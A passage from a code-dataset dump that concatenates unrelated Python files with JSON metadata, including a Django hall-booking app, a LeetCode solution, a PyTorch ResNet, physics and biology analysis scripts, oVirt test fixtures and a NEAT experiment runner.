redirect\nfrom django.urls import reverse\nfrom django.views import View\nfrom datetime import datetime\n\nfrom .models import *\n\n# Create your views here.\n\ntoday = datetime.today().strftime('%Y-%m-%d')\n\n\ndef index(request):\n Halls = Hall.objects.all()\n status = {}\n\n for Hall in Halls:\n if Hall.reservation_set.filter(date=today):\n status[Hall.id] = 'Busy'\n else:\n status[Hall.id] = 'Free'\n ctx = {\n 'Halls': Halls,\n 'status': status,\n }\n return render(request, 'Book/index.html', ctx)\n\n\ndef Hall(request, id):\n Hall = Hall.objects.get(pk=int(id))\n if Hall:\n reservations = Hall.reservation_set.filter(date__gte=today).order_by('date')\n Halls = Hall.objects.all()\n if Hall.projector == True:\n projector = \"Yes\"\n else:\n projector = \"No\"\n ctx = {\n \"Hall\": Hall,\n \"projector\": projector,\n \"reservations\": reservations,\n \"Halls\": Halls,\n }\n else:\n ctx = {\n \"Hall\": 'Hall Not Available',\n \"projector\": 'NA',\n \"reservations\": 'NA',\n \"Halls\": 'NA',\n }\n return render(request, 'Book/Hall.html', ctx)\n\n\nclass NewHallView(View):\n\n def get(self, request):\n return render(request, 'Book/new_Hall.html')\n\n def post(self, request):\n try:\n name = request.POST.get(\"name\")\n capacity = request.POST.get(\"capacity\")\n projector = request.POST.get(\"projector\")\n proj = True if projector == \"True\" else False\n\n Hall.objects.create(name=name, capacity=capacity, projector=proj)\n return redirect(\"/\")\n\n except Exception as e:\n message = \"Incorrect Data: {}\".format(e)\n ctx = {\n \"message\": message,\n }\n return render(request, 'Book/new_Hall.html', ctx)\n\n\nclass ModifyView(View):\n\n def get(self, request, id):\n Hall = Hall.objects.get(pk=id)\n ctx = {\n \"Hall\": Hall,\n }\n return render(request, 'Book/modify.html', ctx)\n\n def post(self, request, id):\n name = request.POST.get(\"name\")\n capacity = request.POST.get(\"capacity\")\n projector = True if request.POST.get('projector') else False\n Hall = Hall.objects.get(pk=id)\n try:\n Hall.name = name\n Hall.capacity = capacity\n Hall.projector = projector\n Hall.save()\n return redirect(\"/\")\n except Exception as e:\n message = \"Incorrect Data: {}\".format(e)\n ctx = {\n \"message\": message,\n \"Hall\": Hall,\n }\n return render(request, 'Book/modify.html', ctx)\n\n\nclass DeleteView(View):\n\n def get(self, request, id):\n Hall = Hall.objects.get(pk=id)\n ctx = {\n \"Hall\": Hall,\n }\n return render(request, 'Book/delete.html', ctx)\n\n def post(self, request, id):\n action = request.POST.get(\"submit\")\n\n if action == \"Yes\":\n Hall = Hall.objects.get(pk=id)\n Hall.delete()\n return redirect(\"/\")\n\n\nclass ReservationView(View):\n\n def get(self, request, id):\n Hall = Hall.objects.get(pk=id)\n reservations = Hall.reservation_set.filter(date__gte=today).order_by('date')\n ctx = {\n \"Hall\": Hall,\n \"reservations\": reservations,\n }\n return render(request, 'Book/reservation.html', ctx)\n\n def post(self, request, id):\n Hall = Hall.objects.get(pk=id)\n reservations = Hall.reservation_set.filter(date__gte=today).order_by('date')\n try:\n date = request.POST.get(\"date\")\n comment = request.POST.get(\"comment\")\n message = \"\"\n\n if Hall.reservation_set.filter(date=date):\n message = \"This Hall is already occupied for that day\"\n elif date < today:\n message = \"The chosen data can not be in the past\"\n\n if (message == \"This Hall is already occupied for that day\"\n or message == \"The chosen data can not be in the past\"):\n ctx = {\n \"Hall\": Hall,\n \"reservations\": reservations,\n \"message\": message,\n }\n return render(request, 'Book/reservation.html', ctx)\n\n reservation = Reservation.objects.create(date=date, comment=comment)\n reservation.Hall.add(Hall)\n\n except Exception as e:\n message = \"Incorrect Data: {}\".format(e)\n ctx = {\n \"message\": message,\n \"Hall\": Hall,\n \"reservations\": reservations,\n }\n return render(request, 'Book/reservation.html', ctx)\n\n if Hall.projector == True:\n projector = \"TAK\"\n else:\n projector = \"NIE\"\n message = \"\"\"Dziękujemy! Zarezerwowałeś salę: \n {} w dniu: {}\"\"\".format(Hall.name, date)\n ctx = {\n \"Hall\": Hall,\n \"projector\": projector,\n \"reservations\": reservations,\n \"message\": message,\n }\n return render(request, 'Book/Hall.html', ctx)\n\n\nclass SearchView(View):\n\n def get(self, request):\n Hall = request.GET.get(\"Hall\")\n capacity = request.GET.get(\"capacity\")\n date = request.GET.get(\"date\")\n projector = True if request.GET.get('projector') else False\n\n result1 = Hall.objects.exclude(reservation__date=date)\n\n if Hall == \"\":\n result2 = result1\n else:\n result2 = result1.filter(name__icontains=Hall)\n\n if capacity != \"\":\n result3 = result2.filter(capacity__gte=int(capacity))\n else:\n result3 = result2\n\n if projector:\n result4 = result3.filter(projector=projector)\n else:\n result4 = result3\n\n ctx = {\n \"results\": result4,\n \"date\": date,\n }\n return render(request, 'Book/search.html', ctx)\n\n\n\n\n\n","sub_path":"BookConferenceHallApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"491428025","text":"\"\"\"\nQ031 Next Permutation\nMedium\n\nArray;\n\nthis solution passed but it's not in place!\n\nImplement next permutation, which rearranges numbers\ninto the lexicographically next greater permutation of numbers.\n(that means the order in dictionary)\n\nIf such arrangement is not possible, it must rearrange it\nas the lowest possible order (ie, sorted in ascending order).\n\nThe replacement must be in-place and use only constant extra\nmemory.\n\nHere are some examples. Inputs are in the left-hand column\nand its corresponding outputs are in the right-hand column.\n\n1,2,3 → 1,3,2\n3,2,1 → 1,2,3\n1,1,5 → 1,5,1\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def nextPermutation(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n def swap(i):\n for j in range(i+1, total):\n if nums[i] < nums[j]:\n nums[i], nums[j] = nums[j], nums[i]\n return j\n return False\n\n total = len(nums)\n\n for i in reversed(range(0, total-1)):\n # swap if the previous value is smaller\n # than any of the past values\n # and choose the smallest past value\n if swap(i):\n break\n # sort the numbers after\n nums[i:] = sorted(nums[i:])\n\n\na = [1,1,1]\n\nsol = Solution()\nsol.nextPermutation(a)\nprint(a)","sub_path":"Q031.py","file_name":"Q031.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"20235576","text":"class car:\r\n def __init__(self,manufacture,model,make,transmission,color):\r\n self.manufacture = manufacture\r\n self.model = model\r\n self.make = make\r\n self.transmission = transmission\r\n self.color = color\r\n\r\n def accelerate(self):\r\n print((\"{} {} is moving\").format(self.manufacture,self.model))\r\n\r\n def stop(self):\r\n print((\"{} {} has stopped\").format(self.manufacture,self.model))\r\n\r\nc1 = car(\"Tata\",\"Altroz\",\"2020\",\"Automatic\",\"Midtown Grey\")\r\nc2 = car(\"Mercedes-Benz\",\"GLA\",\"2021\",\"Automatic\",\"Black\")\r\nc3 = car(\"BMW\",\"X1\",\"2021\",\"Automatic\",\"White\")\r\n\r\nc1.accelerate()\r\nc1.stop()\r\n\r\nc2.accelerate()\r\nc2.stop()\r\n\r\nc3.accelerate()\r\nc3.stop()\r\n\r\n\r\n","sub_path":"python/Activity16.py","file_name":"Activity16.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"574591535","text":"import os\nimport csv\n\ncsvpath=os.path.join('Resources','budget_data.csv')\n\nwith open (csvpath, 'r') as csv_file:\n csv_read=csv.reader(csv_file, delimiter=',')\n \n csv_header=next(csv_read)\n \n date=[]\n pl=[]\n plch=[]\n total_pl = 0.0\n total_plch = 0.0\n max_pld=[]\n min_pld=[]\n \n for budget_data in csv_read:\n date.append(budget_data[0])\n pl.append(budget_data[1])\n\n #The total number of months included in the dataset\n total_months = len(date)\n \n #The net total amount of \"Profit/Losses\" over the entire period\n for row in range(total_months):\n total_pl += float(pl[row])\n \n #The changes in \"Profit/Losses\" over the entire period, then find the average of those changes \n for row1 in range(1, (total_months)):\n plch.append(float(pl[row1]) - float(pl[(row1-1)]))\n total_plch += float(plch[(row1-1)])\n #average\n #total_plch += float(plch[row1])\n ave_plch = total_plch / (total_months - 1)\n \n #The greatest increase in profits (date and amount) over the entire period\n #The greatest decrease in losses (date and amount) over the entire period\n max_pl = max(plch)\n min_pl = min(plch)\n\n date1=[]\n for r1 in range(1,len(plch)):\n date1.append(date[r1])\n maxpl_zip = zip(date1, plch)\n\n mz=list(maxpl_zip)\n \n for row2 in range(len(plch)):\n if plch[row2] == max_pl:\n max_pld = mz[row2] \n elif plch[row2] == min_pl:\n min_pld = mz[row2]\n \n \n print(\"-----------------------------\")\n print(\"Financial Analysis\")\n print(\"-----------------------------\")\n print(f\"Total Months: {total_months}\")\n print(f\"Total: ${int(total_pl)}\")\n print(f\"Average Change: ${round(ave_plch,2)}\")\n print(\"Greatest Increase in Profits: \" + str(max_pld[0]) + \" ($\" + str(int(max_pld[1])) + \")\")\n print(\"Greatest Decrease in Profits: \" + str(min_pld[0]) + \" ($\" + str(int(min_pld[1])) + \")\") \n print(\"'''\")\n\n\noutput_path = os.path.join('Financial_Analysis.txt')\nwith open(output_path, 'w', newline='') as fao: \n\n fao.write(\"----------------------------- \\n\")\n fao.write(\"Financial Analysis \\n\")\n fao.write(\"----------------------------- \\n\")\n fao.write(f\"Total Months: {total_months} \\n\")\n fao.write(f\"Total: ${int(total_pl)} \\n\")\n fao.write(f\"Average Change: ${round(ave_plch,2)} \\n\")\n fao.write(\"Greatest Increase in Profits: \" + str(max_pld[0]) + \" ($\" + str(int(max_pld[1])) + \") \\n\")\n fao.write(\"Greatest Decrease in Profits: \" + str(min_pld[0]) + \" ($\" + str(int(min_pld[1])) + \") \\n\")","sub_path":"PyBank/main_otxt.py","file_name":"main_otxt.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"45446032","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_planes, planes, stride=1):\n super(BasicBlock, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion * planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion * planes, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion * planes)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.bn2(self.conv2(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, in_planes, planes, stride=1):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, self.expansion * planes, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(self.expansion * planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion * planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion * planes, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion * planes)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = F.relu(self.bn2(self.conv2(out)))\n out = self.bn3(self.conv3(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\n\nclass ResNet(nn.Module):\n def __init__(self, block, num_blocks, strides=[1, 2, 2, 2], plane=64, num_classes=10):\n super(ResNet, self).__init__()\n self.in_planes = plane\n self.in_planes_1 = plane\n\n self.conv1 = nn.Conv2d(3, plane, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(plane)\n self.layer1 = self._make_layer(block, self.in_planes_1 * np.prod(strides[:1]), num_blocks[0], stride=strides[0])\n self.layer2 = self._make_layer(block, self.in_planes_1 * np.prod(strides[:2]), num_blocks[1], stride=strides[1])\n self.layer3 = self._make_layer(block, self.in_planes_1 * np.prod(strides[:3]), num_blocks[2], stride=strides[2])\n self.layer4 = self._make_layer(block, self.in_planes_1 * np.prod(strides[:4]), num_blocks[3], stride=strides[3])\n self.pool = nn.AdaptiveAvgPool2d((1, 1))\n self.linear = nn.Linear(self.in_planes_1 * np.prod(strides[:4]) * block.expansion, num_classes)\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1] * (num_blocks - 1)\n layers = []\n for stride in strides:\n layers.append(block(self.in_planes, planes, stride))\n self.in_planes = planes * block.expansion\n return nn.Sequential(*layers)\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.layer4(out)\n out = self.pool(out)\n out = self.linear(out.flatten(1))\n return out\n\n\ndef ResNet10(channel=64, num_blocks=[2, 2, 2, 2], strides=[1, 2, 2, 2], num_classes=10, **kwargs):\n return ResNet(BasicBlock, num_blocks, strides, channel, num_classes)\n\n\ndef ResNet18():\n return ResNet(BasicBlock, [2, 2, 2, 2])\n\n\ndef ResNet34():\n return ResNet(BasicBlock, [3, 4, 6, 3])\n\n\ndef ResNet50():\n return ResNet(Bottleneck, [3, 4, 6, 3])\n\n\ndef ResNet101():\n return ResNet(Bottleneck, [3, 4, 23, 3])\n\n\ndef ResNet152():\n return ResNet(Bottleneck, [3, 8, 36, 3])\n\n\ndef test():\n net = ResNet10(16, [1, 1, 1, 1])\n y = net(torch.randn(1, 3, 32, 32))\n print(sum(p.numel() for p in net.parameters() if p.requires_grad))\n print(y.size())\n","sub_path":"models/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":4413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"463925463","text":"from ROOT import TFile, gROOT, gStyle, TH1F, TH2F, kBlue, kRed, TCanvas, TLatex, TLegend\nimport os, numpy, copy\nfrom officialStyle import officialStyle\n\n\ngROOT.SetBatch(True)\nofficialStyle(gStyle)\ngStyle.SetPadLeftMargin(0.18)\ngStyle.SetPadBottomMargin(0.15)\n\ndef returnRange(hist):\n \n bin = []\n \n for ibin in range(0, hist.GetNbinsX()+1):\n proj = hist.ProjectionY(\"ProjY_\"+str(ibin), ibin, ibin+1)\n if proj.GetEntries() > 100:\n bin.append(ibin)\n\n return min(bin), max(bin)\n\n\n\ndef LegendSettings(leg):\n leg.SetBorderSize(0)\n leg.SetFillColor(10)\n leg.SetLineColor(0)\n leg.SetFillStyle(0)\n leg.SetTextSize(0.035)\n leg.SetTextFont(42)\n\ncolours = [2, 3, 4, 6, 7, 8]\n\nprocess = 'DY'\n#process = 'VBF'\n\ndirectory = 'sample_20140513'\n\nsamples = []\nif process=='DY':\n samples = ['DY_Standard', 'DY_Timing', 'DY_3DandTiming']\nelif process=='VBF':\n samples = ['VBF_Standard125', 'VBF_Timing125', 'VBF_3DandTiming125']\n\n\nplots = ['tau_iso_neutralPt','tau_iso_neutralPtWeight1','tau_iso_neutralPtWeight2','tau_iso_neutralPtWeight1NQ','tau_iso_neutralPtWeight2NQ']\n\nplotleg = ['#Sigma_{neutral} p_{T} [GeV]', \n '#Sigma_{neutral, weight1} p_{T} [GeV]',\n '#Sigma_{neutral, weight1 NQ} p_{T} [GeV]',\n '#Sigma_{neutral, weight2} p_{T} [GeV]',\n '#Sigma_{neutral, weight2 NQ} p_{T} [GeV]',\n ]\n\nbarrel_endcap = ['all', 'barrel', 'endcap']\n\n\nhist2d_save = [[[i for i in range(len(samples))] for j in range(len(barrel_endcap))] for k in range(len(plots))]\nhist_save = [[[i for i in range(len(samples))] for j in range(len(barrel_endcap))] for k in range(len(plots))]\nf1_save = [[[i for i in range(len(samples))] for j in range(len(barrel_endcap))] for k in range(len(plots))]\n\n\nfor iplot, plot in enumerate(plots):\n for ibe, isbarrel in enumerate(barrel_endcap):\n\n hist = [i for i in range(len(samples))]\n hist2d = [i for i in range(len(samples))]\n f1 = [i for i in range(len(samples))]\n \n cname = 'can_' + plot + '_' + isbarrel\n can = TCanvas(cname, cname)\n\n for ii, sample in enumerate(samples):\n\n tfile = TFile('{dir}/{sample}/TauTreeProducer/TauTreeProducer_tree.root'.format(dir=directory, sample=sample))\n tree = tfile.Get('TauTreeProducer')\n \n hname = 'h_' + sample + '_' + isbarrel + '_' + plot\n hist[ii] = TH2F(hname, hname, 80,0,80, 60,0,60)\n# hist[ii].Sumw2()\n \n if isbarrel=='all':\n tree.Draw(plot + ':tau_iso_sumPUPt >> ' + hname, 'TMath::Abs(parton_pdgId)==15 && tau_decayModeFinding==1')\n elif isbarrel=='barrel':\n tree.Draw(plot + ':tau_iso_sumPUPt >> ' + hname, 'TMath::Abs(parton_pdgId)==15 && tau_decayModeFinding==1 && TMath::Abs(tau_eta) < 1.479')\n else:\n tree.Draw(plot + ':tau_iso_sumPUPt >> ' + hname, 'TMath::Abs(parton_pdgId)==15 && tau_decayModeFinding==1 && TMath::Abs(tau_eta) > 1.479')\n\n\n fitmin, fitmax = returnRange(hist[ii])\n hist2d[ii] = hist[ii].ProfileX()\n hist2d[ii].Fit(\"pol1\",\"\",\"\",fitmin, fitmax)\n f1[ii] = hist2d[ii].GetFunction(\"pol1\");\n \n hist2d[ii].GetXaxis().SetTitle('#Sigma_{PU} p_{T} [GeV]')\n hist2d[ii].GetYaxis().SetTitle(plotleg[iplot])\n hist2d[ii].SetMaximum(20)\n hist2d[ii].SetMinimum(0)\n hist2d[ii].SetMarkerSize(0.1)\n hist2d[ii].SetMarkerColor(colours[ii])\n hist2d[ii].SetLineColor(colours[ii])\n \n tname = process + ', ' + isbarrel\n hist2d[ii].SetTitle(tname)\n\n hist_save[iplot][ibe][ii] = copy.deepcopy(hist[ii])\n hist2d_save[iplot][ibe][ii] = copy.deepcopy(hist2d[ii])\n f1_save[iplot][ibe][ii] = copy.deepcopy(f1[ii])\n\n\n leg = TLegend(0.2,0.75,0.7,0.9)\n LegendSettings(leg)\n\n for ii, sample in enumerate(samples):\n if ii==0:\n hist2d_save[iplot][ibe][ii].Draw()\n else:\n hist2d_save[iplot][ibe][ii].Draw('same')\n \n f1_save[iplot][ibe][ii].SetLineColor(colours[ii])\n f1_save[iplot][ibe][ii].SetLineStyle(2)\n f1_save[iplot][ibe][ii].SetRange(hist2d_save[iplot][ibe][ii].GetXaxis().GetXmin(), hist2d_save[iplot][ibe][ii].GetXaxis().GetXmax())\n f1_save[iplot][ibe][ii].Draw('same')\n\n lname = sample.replace('_', ' ').replace('3DandTiming', '3D & Timing').replace('125','') + ', (' + str(\"{0:.3f}\".format(f1_save[iplot][ibe][ii].GetParameter(1))) + ', ' + str(\"{0:.1f}\".format(round(f1_save[iplot][ibe][ii].GetParameter(0),1))) + ')'\n leg.AddEntry(hist2d_save[iplot][ibe][ii], lname, 'l')\n\n leg.Draw()\n\n sname = 'plot/isolation_' + plot + '_' + isbarrel + '_' + process + '_neutral_vs_puiso.gif'\n can.SaveAs(sname)\n\n\nfile = TFile('root/Myroot_' + process + '.root','recreate')\n\nfor iplot, plot in enumerate(plots):\n for ibe, isbarrel in enumerate(barrel_endcap):\n for ii, sample in enumerate(samples):\n hist_save[iplot][ibe][ii].Write()\n hist2d_save[iplot][ibe][ii].Write()\n\n \nfile.Write()\nfile.Close()\n","sub_path":"AnalysisSpecific/TauIsolation/fitting.py","file_name":"fitting.py","file_ext":"py","file_size_in_byte":5253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"615848333","text":"import pickle\nfrom indra.tools.model_checker import ModelChecker\n#from manual_stmts import stmts as manual_stmts\nfrom assemble_pysb import set_context, add_observables\nimport process_data\nfrom indra.util import write_unicode_csv\nfrom indra.assemblers import PysbAssembler\nimport make_stmts_for_checking as make_stmts\n\nprint(\"Processing data\")\n\ndata = process_data.read_data(process_data.data_file)\ndata_genes = process_data.get_all_gene_names(data)\n\n\nprint('Loading data statements.')\ndata_stmts, data_values = make_stmts.run(dec_thresh=0.5, inc_thresh=1.5)\n\nwith open('korkut_stmts_no_ev.pkl', 'rb') as f:\n print('Loading korkut_model_pysb statements.')\n base_stmts = pickle.load(f)\n\n# Merge the sources of statements\n# stmts = manual_stmts + base_stmts\nstmts = base_stmts\n#stmts = manual_stmts\n\n# Assemble model\npa = PysbAssembler()\npa.add_statements(stmts)\nmodel = pa.make_model()\n\n#with open('korkut_pysb.pkl', 'wb') as f:\n# pickle.dump(pa.model, f)\n\n# Preprocess and assemble the pysb model\n#model = assemble_pysb(combined_stmts, data_genes, '')\n\nmc = ModelChecker(model)\n\n# Iterate over each drug/ab statement subset\nresults = []\nfor drug_name, ab_dict in data_stmts.items():\n for ab, stmt_list in ab_dict.items():\n value = data_values[drug_name][ab]\n # For each subset, check statements; if any of them checks out, we're\n # good and can move on to the next group\n print(\"-- Checking the effect of %s on %s --\" % (drug_name, ab))\n relation = 'positive' if value > 1 else 'negative'\n path_found = 0\n path = ''\n for stmt in stmt_list:\n print(\"Checking: %s\" % stmt)\n result = mc.check_statement(stmt)\n if result:\n print(\"Path found, skipping rest\")\n path_found = 1\n path = str(result)\n break\n else:\n print(\"No path found\")\n\n results.append((drug_name, ab, relation, value, path_found, path))\nwrite_unicode_csv('model_check_results.csv', results)\n","sub_path":"models/phase3_eval/check_pysb_model.py","file_name":"check_pysb_model.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"511838588","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nFixtures for host_network_api\n\"\"\"\n\nimport pytest\n\nimport config as network_api_conf\nimport helper\nfrom art.rhevm_api.tests_lib.high_level import (\n hosts as hl_hosts,\n networks as hl_networks\n)\nfrom art.rhevm_api.tests_lib.low_level import (\n events as ll_events,\n hosts as ll_hosts\n)\nfrom art.unittest_lib import testflow\nimport rhevmtests.networking.config as conf\n\n\n@pytest.fixture(scope=\"class\")\ndef remove_network(request):\n \"\"\"\n Remove network.\n \"\"\"\n nets_to_remove = request.node.cls.nets_to_remove\n assert hl_networks.remove_networks(\n positive=True, networks=nets_to_remove, data_center=conf.DC_0\n )\n\n\n@pytest.fixture(scope=\"class\")\ndef update_host_to_another_cluster(request):\n \"\"\"\n Update host to another cluster.\n \"\"\"\n def fin():\n \"\"\"\n Move host to original cluster.\n \"\"\"\n assert ll_hosts.update_host(\n positive=True, host=conf.HOST_0_NAME, cluster=conf.CL_0\n )\n request.addfinalizer(fin)\n\n assert ll_hosts.update_host(\n positive=True, host=conf.HOST_0_NAME, cluster=network_api_conf.SYNC_CL\n )\n\n\n@pytest.fixture(scope=\"class\")\ndef manage_ip_and_refresh_capabilities(request):\n \"\"\"\n Set temporary IP on interface and refresh capabilities.\n \"\"\"\n host = conf.HOST_0_NAME\n for net, actual_ip, actual_netmask in (\n request.node.cls.manage_ip_list\n ):\n actual_netmask = actual_netmask or \"24\"\n testflow.setup(\n \"Set temporary IP on %s with: IP=%s, Netmask=%s\",\n net, actual_ip, actual_netmask\n )\n helper.manage_host_ip(\n interface=net, ip=actual_ip, netmask=actual_netmask\n )\n last_event = ll_events.get_max_event_id()\n assert ll_hosts.refresh_host_capabilities(\n host=host, start_event_id=last_event\n )\n\n\n@pytest.fixture(scope=\"class\")\ndef reboot_host(request):\n \"\"\"\n Reboot host\n \"\"\"\n host = conf.HOSTS[2]\n vds = conf.VDS_HOSTS[2]\n testflow.setup(\"Reboot host %s\", host)\n assert hl_hosts.deactivate_host_if_up(host=host, host_resource=vds)\n vds.add_power_manager(pm_type=conf.SSH_TYPE)\n vds.get_power_manager().restart()\n for is_connective in (False, True):\n vds.executor().wait_for_connectivity_state(\n positive=is_connective\n )\n\n assert hl_hosts.activate_host_if_not_up(host=host, host_resource=vds)\n","sub_path":"art/tests/rhevmtests/networking/host_network_api/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"270560325","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/8/29 09:05\n# @Author : Maloney\n# @Site : jma@192.168.126.124\n# @File : mnist_loader.py\n# @Software: PyCharm\n\n#### Libraries\n\n# Standard library\n\nimport pickle\n\nimport gzip\n\n# Third-party libraries\n\nimport numpy as np\n\n\ndef load_data():\n f = gzip.open('neural-networks-and-deep-learning/data/mnist.pkl.gz', 'rb')\n training_data, validation_data, test_data = pickle.load(f)\n f.close()\n return (training_data, validation_data, test_data)\n\n\ndef load_data_wrapper():\n tr_d, va_d, te_d = load_data()\n\n training_inputs = [np.reshape(x, (784, 1)) for x in tr_d[0]]\n\n training_results = [vectorized_result(y) for y in tr_d[1]]\n\n training_data = zip(training_inputs, training_results)\n\n validation_inputs = [np.reshape(x, (784, 1)) for x in va_d[0]]\n\n validation_data = zip(validation_inputs, va_d[1])\n\n test_inputs = [np.reshape(x, (784, 1)) for x in te_d[0]]\n\n test_data = zip(test_inputs, te_d[1])\n\n return (training_data, validation_data, test_data)\n\n\ndef vectorized_result(j):\n e = np.zeros((10, 1))\n\n e[j] = 1.0\n\n return e\n","sub_path":"NetWork/mnist_loader.py","file_name":"mnist_loader.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"259564721","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 3 18:30:01 2019\n\n@author: lenovo\n\"\"\"\n#def palindrome_number(list_a):\n # c=0\nn=input(\"Enter the number\").split(\" \")\n#these are the t\nfor i in n:\n if i == i[::-1]:\n print(i)\nt=n\nrev=0\n#this is define the rewverse\nrem = i % 10\n#it used as the remainder\nrev=rev*10+rem\n#it is find the reverse number\ni=i/10\n#if rev==n\nif rev == i:\n print(\"number is palindrome\")\nelse:\n print(\"number is not palindrome\")","sub_path":"day02/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"478169671","text":"import os\nimport time\nimport neat\nfrom gym_multi_robot import visualize\nfrom gym_multi_robot.object_serializer import ObjectSerializer\n\n\nclass SingleExperiment:\n \"\"\" This class gives the functions required to run a single experiment.\"\"\"\n\n def __init__(self, learning_config, exp_runner, num_generations, exp_name='', num_trails=1, base_directory=''):\n self.exp_name = exp_name\n self.learning_config = learning_config\n self.exp_runner = exp_runner\n self.num_generations = num_generations\n self.num_trails = num_trails\n self.winner = None # Stores the winner of the last experiment.\n self.stats = None # Stores the stats about the last experiment.\n self.base_directory = base_directory\n\n def eval_genomes(self, genomes, config):\n start_time = time.time()\n\n for genome_id, genome in genomes:\n\n self.process_genome(genome, config)\n # sub rewards.\n\n end_time = time.time()\n time_diff = end_time - start_time\n avg_time = time_diff / len(genomes)\n\n print(\"generation total_runtime: %s seconds, avg_runtime: %s seconds\" % (time_diff, avg_time))\n\n def process_genome(self, genome, config):\n \"\"\" This function processes a genome to finds its fitness and possibly other details. \"\"\"\n genome.fitness = self.exp_runner.run_multiple_trails(genome, config, self.num_trails)\n\n def run(self, name=None):\n \"\"\" Runs the experiment.\n Name parameter can be used to update the name of the experiment.\n \"\"\"\n if name is not None:\n self.exp_name = name\n\n # Create the population, which is the top-level object for a NEAT run.\n p = neat.Population(self.learning_config)\n\n # Add a stdout reporter to show progress in the terminal.\n p.add_reporter(neat.StdOutReporter(True))\n self.stats = neat.StatisticsReporter()\n p.add_reporter(self.stats)\n\n # Run experiments\n try:\n self.winner = p.run(self.eval_genomes, self.num_generations)\n except Exception:\n raise\n finally:\n self.winner = p.best_genome\n\n self.output_stats()\n self.output_winner()\n\n\n def output_winner(self):\n \"\"\"This function outputs the current winner in graph and in pickle file.\"\"\"\n self.init_base_directory()\n\n net_filename = self.base_directory + 'graph_winner' + str(self.exp_name)\n genome_filename = self.base_directory + 'winner' + str(self.exp_name)\n\n if self.exp_runner is not None:\n self.exp_runner.draw(self.winner, self.learning_config, net_filename)\n\n ObjectSerializer.serialize(self.winner, genome_filename)\n\n print(self.winner)\n\n def output_stats(self):\n \"\"\" This function outputs the statistics in figures and in reusable objects.\"\"\"\n self.init_base_directory()\n\n fitness_out_file = self.base_directory + 'avg_fitness_' + str(self.exp_name) + '.svg'\n species_out_file = self.base_directory + 'species_' + str(self.exp_name) + '.svg'\n stats_out_file = self.base_directory + 'stats' + str(self.exp_name)\n\n visualize.visualize_stats(self.stats, fitness_out_file, species_out_file)\n ObjectSerializer.serialize(self.stats, stats_out_file)\n\n def init_base_directory(self):\n \"\"\" This function checks whether the base directory exists and creates it if it doesn't. \"\"\"\n\n if self.base_directory != '' and not os.path.exists(self.base_directory):\n os.makedirs(self.base_directory)\n","sub_path":"examples/experiment_template.py","file_name":"experiment_template.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"650884717","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2010 United States Government as represented by the\n# Administrator of the National Aeronautics and Space Administration.\n# Copyright 2011 Red Hat, Inc.\n# Copyright (c) 2012 Samsung SDS 